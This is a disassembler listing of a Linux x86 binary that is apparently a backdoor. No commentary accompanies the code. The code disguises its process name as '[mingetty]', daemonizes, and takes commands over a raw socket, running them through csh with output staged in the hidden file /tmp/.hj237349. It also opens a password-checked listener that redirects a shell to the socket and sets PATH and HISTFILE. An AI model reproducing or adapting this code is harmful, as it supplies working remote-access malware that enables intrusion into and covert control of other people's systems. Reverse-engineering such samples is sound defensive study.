08048090: pop %ecx 08048091: mov %esp,%ebx 08048093: mov %esp,%eax 08048095: mov %ecx,%edx 08048097: add %edx,%edx 08048099: add %edx,%edx 0804809b: add %edx,%eax 0804809d: add $0x4,%eax 080480a0: xor %ebp,%ebp 080480a2: push %ebp 080480a3: push %ebp 080480a4: push %ebp 080480a5: mov %esp,%ebp 080480a7: push %eax 080480a8: push %ebx 080480a9: push %ecx 080480aa: mov $0x88,%eax 080480af: mov $0x0,%ebx 080480b4: int $0x80 080480b6: mov 0x8(%esp,1),%eax # Possible reference to data '' 080480ba: mov %eax,0x806d228 # Possible reference to data '' 080480bf: movzwl 0x8078b18,%eax 080480c6: push %eax 080480c7: call 0x0805756c <__setfpucw> 080480cc: add $0x4,%esp 080480cf: call 0x08056d44 <__libc_init> 080480d4: push $0x80675d0 080480d9: call 0x08055f08 080480de: add $0x4,%esp 080480e1: call 0x08048080 080480e6: call 0x08048134
080480eb: push %eax 080480ec: call 0x08055fbc 080480f1: pop %ebx 080480f2: lea 0x0(%esi,1),%esi 080480f9: lea 0x0(%esi,1),%esi 08048100: mov $0x1,%eax * 08048105: int $0x80 | 08048107: jmp 0x08048100 * 08048109: lea 0x0(%esi,1),%esi 08048110: push %ebx 08048111: mov $0x80792b8,%ebx 08048116: cmpl $0x0,0x80792b8 0804811d: je 0x0804812c * 0804811f: nop | 08048120: mov (%ebx),%eax *| 08048122: call *%eax || 08048124: add $0x4,%ebx || 08048127: cmpl $0x0,(%ebx) || 0804812a: jne 0x08048120 *| 0804812c: pop %ebx * 0804812d: ret 0804812e: lea (%esi),%esi 08048130: ret 08048131: nop 08048132: nop 08048133: nop # 08048134
: 08048134: push %ebp 08048135: mov %esp,%ebp 08048137: sub $0x44f0,%esp 0804813d: push %edi 0804813e: push %esi 0804813f: push %ebx 08048140: mov 0xc(%ebp),%ebx 08048143: movl $0x1,-0x44c0(%ebp) 0804814d: lea -0x800(%ebp),%edx 08048153: mov %edx,-0x44d0(%ebp) 08048159: lea -0x7ec(%ebp),%ecx 0804815f: mov %ecx,-0x44d4(%ebp) 08048165: lea -0x7ea(%ebp),%edx 0804816b: mov %edx,-0x44d8(%ebp) 08048171: movl $0x10,-0x44c4(%ebp) 0804817b: call 0x0805720c <__libc_geteuid> 08048180: test %eax,%eax 08048182: je 0x0804818c * 08048184: push $-0x1 | 08048186: call 0x08055fbc | 0804818b: nop | 0804818c: mov (%ebx),%edx * 0804818e: xor %al,%al 08048190: mov %edx,%edi 08048192: cld 08048193: mov $-0x1,%ecx 08048198: repnz scas %es:(%edi),%al 0804819a: mov %ecx,%eax 0804819c: not %eax 0804819e: dec %eax 0804819f: push %eax 080481a0: push $0x0 080481a2: push %edx 080481a3: call 0x08057764 080481a8: mov (%ebx),%edx # Possible reference to rodata '[mingetty]' 080481aa: mov 0x80675d8,%eax 080481af: mov %eax,(%edx) # Possible reference to rodata 'getty]' 080481b1: mov 0x80675dc,%eax 080481b6: mov %eax,0x4(%edx) # Possible reference to rodata 'y]' 080481b9: mov 0x80675e0,%ax 080481bf: mov %ax,0x8(%edx) # Possible reference to rodata '' 080481c3: mov 0x80675e2,%al 080481c9: mov %al,0xa(%edx) 080481cc: push $0x1 080481ce: push $0x11 080481d0: call 0x080569bc 080481d5: call 0x080571e8 <__libc_fork> 080481da: add $0x14,%esp 080481dd: test %eax,%eax 080481df: je 0x080481e8 * 080481e1: push $0x0 | 080481e3: call 0x08055fbc | 080481e8: call 0x0805733c <__libc_setsid> * 080481ed: push $0x1 080481ef: push $0x11 080481f1: call 0x080569bc 080481f6: call 0x080571e8 <__libc_fork> 080481fb: add $0x8,%esp 080481fe: test %eax,%eax 08048200: je 0x0804820c * 08048202: push $0x0 | 08048204: call 0x08055fbc | 08048209: lea 0x0(%esi),%esi | # Possible reference to rodata '/' 0804820c: push $0x80675e3 * 08048211: call 0x08057134 <__libc_chdir> 08048216: push $0x0 08048218: call 0x08057160 <__libc_close> 0804821d: push $0x1 0804821f: call 0x08057160 <__libc_close> 08048224: push $0x2 08048226: call 0x08057160 <__libc_close> # Possible reference to data in bss 0804822b: movl $0x0,0x807e774 # Possible reference to data in bss 08048235: movl $0x0,0x807e770 # Possible reference to data in bss 0804823f: movl $0x0,0x807e778 08048249: push $0x0 0804824b: call 0x08057444 <__libc_time> 08048250: add $0x14,%esp 08048253: push %eax 08048254: call 0x080559a0 <__srandom> 08048259: add $0x4,%esp 0804825c: push $0xb 0804825e: push $0x3 08048260: push $0x2 08048262: call 0x08056cf4 08048267: mov %eax,-0x44c8(%ebp) 0804826d: push $0x1 0804826f: push $0x1 08048271: call 0x080569bc 08048276: push $0x1 08048278: push $0xf 0804827a: call 0x080569bc 0804827f: push $0x1 08048281: push $0x11 08048283: call 0x080569bc 08048288: add $0x24,%esp 0804828b: push $0x1 0804828d: push $0x11 0804828f: call 0x080569bc 08048294: add $0x8,%esp 08048297: lea -0x1000(%ebp),%ecx 0804829d: mov %ecx,-0x44e0(%ebp) 080482a3: lea -0x11b8(%ebp),%edx 080482a9: mov %edx,-0x44e4(%ebp) 080482af: nop 080482b0: push $0x0 * 080482b2: push $0x800 | 080482b7: lea -0x800(%ebp),%eax | 080482bd: push %eax | 080482be: mov -0x44c8(%ebp),%ecx | 080482c4: push %ecx | 080482c5: call 0x08056b44 | 080482ca: mov %eax,%esi | 080482cc: add $0x10,%esp | 080482cf: mov -0x44d0(%ebp),%edx | 080482d5: cmpb $0xb,0x9(%edx) | 080482d9: jne 0x08048eb8 *| 080482df: mov -0x44d4(%ebp),%ecx || 080482e5: cmpb $0x2,(%ecx) || 080482e8: jne 0x08048eb8 *|| 080482ee: cmp $0xc8,%esi ||| 080482f4: jle 0x08048eb8 *||| 080482fa: mov -0x44e0(%ebp),%edx |||| 08048300: push %edx |||| 08048301: mov -0x44d8(%ebp),%ecx |||| 08048307: push %ecx |||| 08048308: lea -0x16(%esi),%eax |||| 0804830b: push %eax |||| 0804830c: call 0x0804a1e8 |||| 08048311: add $0xc,%esp |||| 08048314: movzbl -0xfff(%ebp),%eax |||| 0804831b: dec %eax |||| 0804831c: cmp $0xb,%eax |||| 0804831f: ja 0x08048eb8 *|||| 08048325: jmp *0x804832c(,%eax,4) ||||| # Indexed jump 00 0804835c # Indexed jump 01 080483f0 # Indexed jump 02 08048590 # Indexed jump 03 0804871c # Indexed jump 04 080487c8 # Indexed jump 05 08048894 # Indexed jump 06 08048acc # Indexed jump 07 08048b58 # Indexed jump 08 08048b80 # Indexed jump 09 08048c34 # Indexed jump 0a 08048d08 # Indexed jump 0b 08048de4 # Possible reference to rodata '' 0804835c: mov 0x80675e5,%al ||||| 08048362: mov %al,-0x800(%ebp) ||||| # Possible reference to data in bss 08048368: mov 0x807e77c,%eax ||||| 0804836d: mov %al,-0x800(%ebp) ||||| 08048373: movb $0x1,-0x7ff(%ebp) ||||| 0804837a: movb $0x7,-0x7fe(%ebp) ||||| # Possible reference to data in bss 08048381: cmpl $0x0,0x807e774 ||||| 08048388: je 0x080483a0 *||||| 0804838a: movb $0x1,-0x7fd(%ebp) |||||| # Possible reference to data in bss 08048391: mov 0x807e778,%eax |||||| 08048396: mov %al,-0x7fc(%ebp) |||||| 0804839c: jmp 0x080483a7 *|||||| 0804839e: lea (%esi),%esi ||||||| 080483a0: movb $0x0,-0x7fd(%ebp) |*||||| 080483a7: mov -0x44e0(%ebp),%edx * ||||| 080483ad: push %edx ||||| 080483ae: lea -0x800(%ebp),%eax ||||| 080483b4: push %eax ||||| 080483b5: push $0x190 ||||| 080483ba: call 0x0804a194 ||||| 080483bf: call 0x08056058 ||||| 080483c4: mov $0xc9,%ecx ||||| 080483c9: cltd ||||| 080483ca: idiv %ecx ||||| 080483cc: mov %edx,%ebx ||||| 080483ce: lea 0x190(%ebx),%eax ||||| 080483d4: push %eax ||||| 080483d5: mov -0x44e0(%ebp),%edx ||||| 080483db: push %edx ||||| 080483dc: mov -0x44e4(%ebp),%ecx ||||| 080483e2: push %ecx ||||| 080483e3: call 0x08048ecc ||||| 080483e8: add $0x18,%esp ||||| 080483eb: jmp 0x08048eb8 *||||| 080483f0: movzbl -0xffe(%ebp),%edx |||||| # Possible reference to data in bss 080483f7: mov %edx,0x807e784 |||||| 080483fd: mov -0x7f0(%ebp),%al |||||| # Possible reference to data in bss 08048403: mov %al,0x807e780 |||||| 08048409: mov -0x7ef(%ebp),%al |||||| # Possible reference to data in bss 0804840f: mov %al,0x807e781 |||||| 08048415: mov -0x7ee(%ebp),%al |||||| # Possible reference to data in bss 0804841b: mov %al,0x807e782 |||||| 08048421: mov -0x7ed(%ebp),%al |||||| # Possible reference to data in bss 08048427: mov %al,0x807e783 |||||| 0804842d: push $0x0 |||||| 0804842f: call 0x08057444 <__libc_time> |||||| 08048434: add $0x4,%esp |||||| 08048437: push %eax |||||| 08048438: call 0x080559a0 <__srandom> |||||| 0804843d: add $0x4,%esp |||||| 08048440: call 0x08056058 |||||| 08048445: mov $0xa,%ecx |||||| 0804844a: cltd |||||| 0804844b: idiv %ecx |||||| 0804844d: mov %edx,%edi |||||| 0804844f: xor %ebx,%ebx |||||| 08048451: xor %esi,%esi |||||| 08048453: nop |||||| 08048454: cmp %edi,%ebx *|||||| 08048456: je 0x0804852b *||||||| # Possible reference to data in bss 0804845c: cmpl $0x2,0x807e784 |||||||| 08048463: jne 0x08048498 * |||||||| 08048465: mov -0xffd(%ebp,%ebx,4),%al | |||||||| 0804846c: mov -0x44e4(%ebp),%edx | |||||||| 08048472: mov %al,(%edx,%esi,1) | |||||||| 08048475: mov -0xffc(%ebp,%ebx,4),%al | |||||||| 0804847c: mov %al,0x1(%esi,%edx,1) | |||||||| 08048480: mov -0xffb(%ebp,%ebx,4),%al | |||||||| 08048487: mov %al,0x2(%esi,%edx,1) | |||||||| 0804848b: mov -0xffa(%ebp,%ebx,4),%al | |||||||| 08048492: jmp 0x08048527 |*|||||||| 08048497: nop |||||||||| 08048498: call 0x08056058 *||||||||| 0804849d: mov %eax,-0x44f0(%ebp) ||||||||| 080484a3: test %eax,%eax ||||||||| 080484a5: jge 0x080484b3 *||||||||| 080484a7: lea 0xff(%eax),%ecx |||||||||| 080484ad: mov %ecx,-0x44f0(%ebp) |||||||||| 080484b3: mov -0x44e4(%ebp),%edx *||||||||| 080484b9: mov %al,(%esi,%edx,1) ||||||||| 080484bc: call 0x08056058 ||||||||| 080484c1: mov %eax,-0x44f0(%ebp) ||||||||| 080484c7: test %eax,%eax ||||||||| 080484c9: jge 0x080484d7 *||||||||| 080484cb: lea 0xff(%eax),%ecx |||||||||| 080484d1: mov %ecx,-0x44f0(%ebp) |||||||||| 080484d7: mov -0x44e4(%ebp),%edx *||||||||| 080484dd: mov %al,0x1(%esi,%edx,1) ||||||||| 080484e1: call 0x08056058 ||||||||| 080484e6: mov %eax,-0x44f0(%ebp) ||||||||| 080484ec: test %eax,%eax ||||||||| 080484ee: jge 0x080484fc *||||||||| 080484f0: lea 0xff(%eax),%ecx |||||||||| 080484f6: mov %ecx,-0x44f0(%ebp) |||||||||| 080484fc: mov -0x44e4(%ebp),%edx *||||||||| 08048502: mov %al,0x2(%esi,%edx,1) ||||||||| 08048506: call 0x08056058 ||||||||| 0804850b: mov %eax,-0x44f0(%ebp) ||||||||| 08048511: test %eax,%eax ||||||||| 08048513: jge 0x08048521 *||||||||| 08048515: lea 0xff(%eax),%ecx |||||||||| 0804851b: mov %ecx,-0x44f0(%ebp) |||||||||| 08048521: mov -0x44e4(%ebp),%edx *||||||||| 08048527: mov %al,0x3(%esi,%edx,1) *|||||||| 0804852b: add $0x4,%esi *||||||| 0804852e: inc %ebx ||||||| 0804852f: cmp $0x9,%ebx ||||||| 08048532: jle 0x08048454 *|||||| # Possible reference to data in bss 08048538: mov 0x807e784,%eax |||||| 0804853d: test %eax,%eax |||||| 0804853f: jne 0x08048543 *|||||| 08048541: xor %edi,%edi ||||||| 08048543: cmp $0x2,%eax *|||||| 08048546: je 0x08048eb8 *|||||| 0804854c: shl $0x2,%edi ||||||| 0804854f: mov %edi,-0x44ec(%ebp) ||||||| 08048555: mov -0xffd(%ebp),%al ||||||| 0804855b: mov -0x44e4(%ebp),%ecx ||||||| 08048561: mov %al,(%edi,%ecx,1) ||||||| 08048564: mov -0xffc(%ebp),%al ||||||| 0804856a: mov -0x44ec(%ebp),%edx ||||||| 08048570: mov %al,0x1(%edx,%ecx,1) ||||||| 08048574: mov -0xffb(%ebp),%al ||||||| 0804857a: mov %al,0x2(%edx,%ecx,1) ||||||| 0804857e: mov -0xffa(%ebp),%al ||||||| 08048584: mov %al,0x3(%edx,%ecx,1) ||||||| 08048588: jmp 0x08048eb8 *||||||| 0804858d: lea 0x0(%esi),%esi |||||||| 08048590: call 0x080571e8 <__libc_fork> |||||||| # Possible reference to data in bss 08048595: mov %eax,0x807e770 |||||||| 0804859a: test %eax,%eax |||||||| 0804859c: jne 0x08048eb8 *|||||||| 080485a2: call 0x0805733c <__libc_setsid> ||||||||| 080485a7: push $0x1 ||||||||| 080485a9: push $0x11 ||||||||| 080485ab: call 0x080569bc ||||||||| 080485b0: call 0x080571e8 <__libc_fork> ||||||||| 080485b5: add $0x8,%esp ||||||||| 080485b8: test %eax,%eax ||||||||| 080485ba: je 0x080485d8 *||||||||| 080485bc: push $0xa |||||||||| 080485be: call 0x080556cc |||||||||| 080485c3: push $0x9 |||||||||| # Possible reference to data in bss 080485c5: mov 0x807e770,%eax |||||||||| 080485ca: push %eax |||||||||| 080485cb: call 0x080572b0 <__libc_kill> |||||||||| 080485d0: push $0x0 |||||||||| 080485d2: call 0x08055fbc |||||||||| 080485d7: nop |||||||||| 080485d8: xor %ebx,%ebx *||||||||| 080485da: lea (%esi),%esi ||||||||| 080485dc: mov -0xffe(%ebx,%ebp,1),%al *||||||||| 080485e3: mov %al,-0x1000(%ebx,%ebp,1) |||||||||| 080485ea: inc %ebx |||||||||| 080485eb: cmp $0x18d,%ebx |||||||||| 080485f1: jle 0x080485dc *||||||||| # Possible reference to rodata '/tmp/.hj237349' 080485f3: push $0x80675e6 ||||||||| 080485f8: mov -0x44e0(%ebp),%ecx ||||||||| 080485fe: push %ecx ||||||||| # Possible reference to rodata '/bin/csh -f -c "%s" 1> %s 2>&1' 080485ff: push $0x80675f5 ||||||||| 08048604: lea -0x800(%ebp),%ebx ||||||||| 0804860a: push %ebx ||||||||| 0804860b: call 0x0804f808 <_IO_sprintf> ||||||||| 08048610: push %ebx ||||||||| 08048611: call 0x080557e8 ||||||||| # Possible reference to rodata 'rb' 08048616: push $0x8067614 ||||||||| # Possible reference to rodata '/tmp/.hj237349' 0804861b: push $0x80675e6 ||||||||| 08048620: call 0x0804f620 <_IO_fopen> ||||||||| 08048625: mov %eax,-0x44dc(%ebp) ||||||||| 0804862b: add $0x1c,%esp ||||||||| 0804862e: test %eax,%eax ||||||||| 08048630: je 0x08048712 *||||||||| 08048636: xor %edi,%edi |||||||||| 08048638: lea -0x1190(%ebp),%edx |||||||||| 0804863e: mov %edx,-0x44e8(%ebp) |||||||||| 08048644: mov -0x44dc(%ebp),%ecx *|||||||||| 0804864a: push %ecx ||||||||||| 0804864b: push $0x18e ||||||||||| 08048650: push $0x1 ||||||||||| 08048652: lea -0x800(%ebp),%eax ||||||||||| 08048658: push %eax ||||||||||| 08048659: call 0x0804f6d4 <_IO_fread> ||||||||||| 0804865e: mov %eax,%esi ||||||||||| 08048660: movb $0x0,-0x800(%esi,%ebp,1) ||||||||||| 08048668: xor %ebx,%ebx ||||||||||| 0804866a: add $0x10,%esp ||||||||||| 0804866d: lea 0x0(%esi),%esi ||||||||||| 08048670: mov -0x800(%ebx,%ebp,1),%al *||||||||||| 08048677: mov %al,-0xffe(%ebx,%ebp,1) |||||||||||| 0804867e: inc %ebx |||||||||||| 0804867f: cmp $0x18d,%ebx |||||||||||| 08048685: jle 0x08048670 *||||||||||| 08048687: test %edi,%edi ||||||||||| 08048689: jne 0x0804869c *||||||||||| 0804868b: movb $0x3,-0xfff(%ebp) |||||||||||| 08048692: mov $0x1,%edi |||||||||||| 08048697: jmp 0x080486a3 *|||||||||||| 08048699: lea 0x0(%esi),%esi ||||||||||||| 0804869c: movb $0x4,-0xfff(%ebp) |*||||||||||| 080486a3: mov -0x44e8(%ebp),%edx * ||||||||||| 080486a9: push %edx ||||||||||| 080486aa: mov -0x44e0(%ebp),%ecx ||||||||||| 080486b0: push %ecx ||||||||||| 080486b1: push $0x190 ||||||||||| 080486b6: call 0x0804a194 ||||||||||| 080486bb: call 0x08056058 ||||||||||| 080486c0: mov $0xc9,%ecx ||||||||||| 080486c5: cltd ||||||||||| 080486c6: idiv %ecx ||||||||||| 080486c8: mov %edx,%ebx ||||||||||| 080486ca: lea 0x190(%ebx),%eax ||||||||||| 080486d0: push %eax ||||||||||| 080486d1: mov -0x44e8(%ebp),%edx ||||||||||| 080486d7: push %edx ||||||||||| 080486d8: mov -0x44e4(%ebp),%ecx ||||||||||| 080486de: push %ecx ||||||||||| 080486df: call 0x08048ecc ||||||||||| 080486e4: push $0x61a80 ||||||||||| 080486e9: call 0x080555b0 ||||||||||| 080486ee: add $0x1c,%esp ||||||||||| 080486f1: test %esi,%esi ||||||||||| 080486f3: jne 0x08048644 *|||||||||| 080486f9: mov -0x44dc(%ebp),%edx |||||||||| 080486ff: push %edx |||||||||| 08048700: call 0x0804f540 <_IO_fclose> |||||||||| # Possible reference to rodata '/tmp/.hj237349' 08048705: push $0x80675e6 |||||||||| 0804870a: call 0x080573bc <__libc_unlink> |||||||||| 0804870f: add $0x8,%esp |||||||||| 08048712: push $0x0 *||||||||| 08048714: call 0x08057554 <_exit> ||||||||| 08048719: lea 0x0(%esi),%esi ||||||||| # Possible reference to data in bss 0804871c: cmpl $0x0,0x807e774 ||||||||| 08048723: jne 0x08048eb8 *||||||||| # Possible reference to data in bss 08048729: movl $0x4,0x807e778 |||||||||| 08048733: call 0x080571e8 <__libc_fork> |||||||||| # Possible reference to data in bss 08048738: mov %eax,0x807e774 |||||||||| 0804873d: test %eax,%eax |||||||||| 0804873f: jne 0x08048eb8 *|||||||||| 08048745: lea -0x44bc(%ebp),%edi ||||||||||| 0804874b: lea -0x1000(%ebp),%esi ||||||||||| 08048751: cld ||||||||||| 08048752: mov $0x3f,%ecx ||||||||||| 08048757: repz movsl %ds:(%esi),%es:(%edi) ||||||||||| 08048759: movsw %ds:(%esi),%es:(%edi) ||||||||||| 0804875b: movsb %ds:(%esi),%es:(%edi) ||||||||||| 0804875c: xor %ebx,%ebx ||||||||||| 0804875e: lea (%esi),%esi ||||||||||| 08048760: mov -0x44b3(%ebx,%ebp,1),%al *||||||||||| 08048767: mov %al,-0x44bc(%ebx,%ebp,1) |||||||||||| 0804876e: inc %ebx |||||||||||| 0804876f: cmp $0xfe,%ebx |||||||||||| 08048775: jle 0x08048760 *||||||||||| 08048777: lea -0x44bc(%ebp),%eax ||||||||||| 0804877d: push %eax ||||||||||| 0804877e: movzbl -0xff8(%ebp),%eax ||||||||||| 08048785: push %eax ||||||||||| 08048786: movzbl -0xff9(%ebp),%eax ||||||||||| 0804878d: push %eax ||||||||||| 0804878e: movzbl -0xffa(%ebp),%eax ||||||||||| 08048795: push %eax ||||||||||| 08048796: push $0x0 ||||||||||| 08048798: movzbl -0xffb(%ebp),%eax ||||||||||| 0804879f: push %eax ||||||||||| 080487a0: movzbl -0xffc(%ebp),%eax ||||||||||| 080487a7: push %eax ||||||||||| 080487a8: movzbl -0xffd(%ebp),%eax ||||||||||| 080487af: push %eax ||||||||||| 080487b0: movzbl -0xffe(%ebp),%eax ||||||||||| 080487b7: push %eax ||||||||||| 080487b8: call 0x08049174 ||||||||||| 080487bd: add $0x24,%esp ||||||||||| 080487c0: push $0x0 ||||||||||| 080487c2: call 0x08057554 <_exit> ||||||||||| 080487c7: nop ||||||||||| # Possible reference to data in bss 080487c8: cmpl $0x0,0x807e774 ||||||||||| 080487cf: jne 0x08048eb8 *||||||||||| # Possible reference to data in bss 080487d5: movl $0x5,0x807e778 |||||||||||| 080487df: call 0x080571e8 <__libc_fork> |||||||||||| # Possible reference to data in bss 080487e4: mov %eax,0x807e774 |||||||||||| 080487e9: test %eax,%eax |||||||||||| 080487eb: jne 0x08048eb8 *|||||||||||| 080487f1: lea -0x44bc(%ebp),%edi ||||||||||||| 080487f7: lea -0x1000(%ebp),%esi ||||||||||||| 080487fd: cld ||||||||||||| 080487fe: mov $0x3f,%ecx ||||||||||||| 08048803: repz movsl %ds:(%esi),%es:(%edi) ||||||||||||| 08048805: movsw %ds:(%esi),%es:(%edi) ||||||||||||| 08048807: movsb %ds:(%esi),%es:(%edi) ||||||||||||| 08048808: xor %ebx,%ebx ||||||||||||| 0804880a: lea (%esi),%esi ||||||||||||| 0804880c: mov -0x44af(%ebx,%ebp,1),%al *||||||||||||| 08048813: mov %al,-0x44bc(%ebx,%ebp,1) |||||||||||||| 0804881a: inc %ebx |||||||||||||| 0804881b: cmp $0xfe,%ebx |||||||||||||| 08048821: jle 0x0804880c *||||||||||||| 08048823: lea -0x44bc(%ebp),%eax ||||||||||||| 08048829: push %eax ||||||||||||| 0804882a: movzbl -0xff4(%ebp),%eax ||||||||||||| 08048831: push %eax ||||||||||||| 08048832: movzbl -0xff5(%ebp),%eax ||||||||||||| 08048839: push %eax ||||||||||||| 0804883a: movzbl -0xff6(%ebp),%eax ||||||||||||| 08048841: push %eax ||||||||||||| 08048842: movzbl -0xff7(%ebp),%eax ||||||||||||| 08048849: push %eax ||||||||||||| 0804884a: movzbl -0xff8(%ebp),%eax ||||||||||||| 08048851: push %eax ||||||||||||| 08048852: movzbl -0xff9(%ebp),%eax ||||||||||||| 08048859: push %eax ||||||||||||| 0804885a: movzbl -0xffa(%ebp),%eax ||||||||||||| 08048861: push %eax ||||||||||||| 08048862: movzbl -0xffb(%ebp),%eax ||||||||||||| 08048869: push %eax ||||||||||||| 0804886a: movzbl -0xffc(%ebp),%eax ||||||||||||| 08048871: push %eax ||||||||||||| 08048872: movzbl -0xffd(%ebp),%eax ||||||||||||| 08048879: push %eax ||||||||||||| 0804887a: movzbl -0xffe(%ebp),%eax ||||||||||||| 08048881: push %eax ||||||||||||| 08048882: call 0x080499f4 ||||||||||||| 08048887: add $0x30,%esp ||||||||||||| 0804888a: push $0x0 ||||||||||||| 0804888c: call 0x08057554 <_exit> ||||||||||||| 08048891: lea 0x0(%esi),%esi ||||||||||||| # Possible reference to data in bss 08048894: cmpl $0x0,0x807e774 ||||||||||||| 0804889b: jne 0x08048eb8 *||||||||||||| # Possible reference to data in bss 080488a1: movl $0x6,0x807e778 |||||||||||||| 080488ab: push $0x1 |||||||||||||| 080488ad: push $0x11 |||||||||||||| 080488af: call 0x080569bc |||||||||||||| 080488b4: call 0x080571e8 <__libc_fork> |||||||||||||| # Possible reference to data in bss 080488b9: mov %eax,0x807e774 |||||||||||||| 080488be: add $0x8,%esp |||||||||||||| 080488c1: test %eax,%eax |||||||||||||| 080488c3: jne 0x08048eb8 *|||||||||||||| 080488c9: call 0x0805733c <__libc_setsid> ||||||||||||||| 080488ce: push $0x1 ||||||||||||||| 080488d0: push $0x11 ||||||||||||||| 080488d2: call 0x080569bc ||||||||||||||| 080488d7: movw $0x2,-0x11c8(%ebp) ||||||||||||||| 080488e0: add $0x8,%esp ||||||||||||||| 080488e3: movw $0xf15a,-0x11c6(%ebp) ||||||||||||||| 080488ec: movl $0x0,-0x11c4(%ebp) ||||||||||||||| 080488f6: movl $0x1,-0x44c0(%ebp) ||||||||||||||| 08048900: push $0x0 ||||||||||||||| 08048902: push $0x1 ||||||||||||||| 08048904: push $0x2 ||||||||||||||| 08048906: call 0x08056cf4 ||||||||||||||| 0804890b: mov %eax,-0x44c8(%ebp) ||||||||||||||| 08048911: push $0x1 ||||||||||||||| 08048913: push $0x11 ||||||||||||||| 08048915: call 0x080569bc ||||||||||||||| 0804891a: push $0x1 ||||||||||||||| 0804891c: push $0x11 ||||||||||||||| 0804891e: call 0x080569bc ||||||||||||||| 08048923: push $0x1 ||||||||||||||| 08048925: push $0x1 ||||||||||||||| 08048927: call 0x080569bc ||||||||||||||| 0804892c: add $0x24,%esp ||||||||||||||| 0804892f: push $0x1 ||||||||||||||| 08048931: push $0xf ||||||||||||||| 08048933: call 0x080569bc ||||||||||||||| 08048938: push $0x1 ||||||||||||||| 0804893a: push $0x2 ||||||||||||||| 0804893c: call 0x080569bc ||||||||||||||| 08048941: push $0x4 ||||||||||||||| 08048943: lea -0x44c0(%ebp),%eax ||||||||||||||| 08048949: push %eax ||||||||||||||| 0804894a: push $0x2 ||||||||||||||| 0804894c: push $0x1 ||||||||||||||| 0804894e: mov -0x44c8(%ebp),%ecx ||||||||||||||| 08048954: push %ecx ||||||||||||||| 08048955: call 0x08056c9c ||||||||||||||| 0804895a: add $0x24,%esp ||||||||||||||| 0804895d: push $0x10 ||||||||||||||| 0804895f: lea -0x11c8(%ebp),%eax ||||||||||||||| 08048965: push %eax ||||||||||||||| 08048966: mov -0x44c8(%ebp),%edx ||||||||||||||| 0804896c: push %edx ||||||||||||||| 0804896d: call 0x08056a74 ||||||||||||||| 08048972: push $0x3 ||||||||||||||| 08048974: mov -0x44c8(%ebp),%ecx ||||||||||||||| 0804897a: push %ecx ||||||||||||||| 0804897b: call 0x08056b04 ||||||||||||||| 08048980: add $0x14,%esp ||||||||||||||| 08048983: nop ||||||||||||||| 08048984: lea -0x44c4(%ebp),%eax * ||||||||||||||| 0804898a: push %eax | ||||||||||||||| 0804898b: lea -0x11d8(%ebp),%eax | ||||||||||||||| 08048991: push %eax | ||||||||||||||| 08048992: mov -0x44c8(%ebp),%edx | ||||||||||||||| 08048998: push %edx | ||||||||||||||| 08048999: call 0x08056a2c | ||||||||||||||| 0804899e: mov %eax,-0x44cc(%ebp) | ||||||||||||||| 080489a4: add $0xc,%esp | ||||||||||||||| 080489a7: test %eax,%eax | ||||||||||||||| 080489a9: je 0x08048ac4 |*||||||||||||||| 080489af: call 0x080571e8 <__libc_fork> ||||||||||||||||| 080489b4: test %eax,%eax ||||||||||||||||| 080489b6: jne 0x08048984 *|||||||||||||||| 080489b8: push $0x0 |||||||||||||||| 080489ba: push $0x13 |||||||||||||||| 080489bc: lea -0x43bc(%ebp),%eax |||||||||||||||| 080489c2: push %eax |||||||||||||||| 080489c3: mov -0x44cc(%ebp),%ecx |||||||||||||||| 080489c9: push %ecx |||||||||||||||| 080489ca: call 0x08056b44 |||||||||||||||| 080489cf: xor %ebx,%ebx |||||||||||||||| 080489d1: add $0x10,%esp |||||||||||||||| 080489d4: mov -0x43bc(%ebx,%ebp,1),%al *|||||||||||||||| 080489db: cmp $0xa,%al ||||||||||||||||| 080489dd: je 0x080489e3 *||||||||||||||||| 080489df: cmp $0xd,%al |||||||||||||||||| 080489e1: jne 0x080489f0 *|||||||||||||||||| 080489e3: movb $0x0,-0x43bc(%ebx,%ebp,1) |*||||||||||||||||| 080489eb: jmp 0x080489fe |*||||||||||||||||| 080489ed: lea 0x0(%esi),%esi ||||||||||||||||||| 080489f0: mov %al,-0x43bc(%ebx,%ebp,1) *|||||||||||||||||| 080489f7: incb -0x43bc(%ebx,%ebp,1) |||||||||||||||||| 080489fe: inc %ebx *||||||||||||||||| 080489ff: cmp $0x12,%ebx ||||||||||||||||| 08048a02: jle 0x080489d4 *|||||||||||||||| 08048a04: lea -0x43bc(%ebp),%esi |||||||||||||||| # Possible reference to rodata 'TfOjG' 08048a0a: mov $0x8067617,%edi |||||||||||||||| 08048a0f: mov $0x6,%ecx |||||||||||||||| 08048a14: cld |||||||||||||||| 08048a15: test $0x0,%al |||||||||||||||| 08048a17: repz cmpsb %es:(%edi),%ds:(%esi) |||||||||||||||| 08048a19: je 0x08048a44 *|||||||||||||||| 08048a1b: push $0x0 ||||||||||||||||| 08048a1d: push $0x4 ||||||||||||||||| # Possible reference to rodata 'ÿû' 08048a1f: push $0x806761d ||||||||||||||||| 08048a24: mov -0x44cc(%ebp),%edx ||||||||||||||||| 08048a2a: push %edx ||||||||||||||||| 08048a2b: call 0x08056bf0 ||||||||||||||||| 08048a30: mov -0x44cc(%ebp),%ecx ||||||||||||||||| 08048a36: push %ecx ||||||||||||||||| 08048a37: call 0x08057160 <__libc_close> ||||||||||||||||| 08048a3c: push $0x1 ||||||||||||||||| 08048a3e: call 0x08055fbc ||||||||||||||||| 08048a43: nop ||||||||||||||||| 08048a44: push $0x0 *|||||||||||||||| 08048a46: mov -0x44cc(%ebp),%edx |||||||||||||||| 08048a4c: push %edx |||||||||||||||| 08048a4d: call 0x0805718c <__libc_dup2> |||||||||||||||| 08048a52: push $0x1 |||||||||||||||| 08048a54: mov -0x44cc(%ebp),%ecx |||||||||||||||| 08048a5a: push %ecx |||||||||||||||| 08048a5b: call 0x0805718c <__libc_dup2> |||||||||||||||| 08048a60: push $0x2 |||||||||||||||| 08048a62: mov -0x44cc(%ebp),%edx |||||||||||||||| 08048a68: push %edx |||||||||||||||| 08048a69: call 0x0805718c <__libc_dup2> |||||||||||||||| 08048a6e: push $0x1 |||||||||||||||| # Possible reference to rodata '/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.' 08048a70: push $0x8067621 |||||||||||||||| # Possible reference to rodata 'PATH' 08048a75: push $0x8067651 |||||||||||||||| 08048a7a: call 0x0804a2a8 |||||||||||||||| 08048a7f: add $0x24,%esp |||||||||||||||| # Possible reference to rodata 'HISTFILE' 08048a82: push $0x8067656 |||||||||||||||| 08048a87: call 0x0804a48c |||||||||||||||| 08048a8c: push $0x1 |||||||||||||||| # Possible reference to rodata 'linux' 08048a8e: push $0x806765f |||||||||||||||| # Possible reference to rodata 'TERM' 08048a93: push $0x8067665 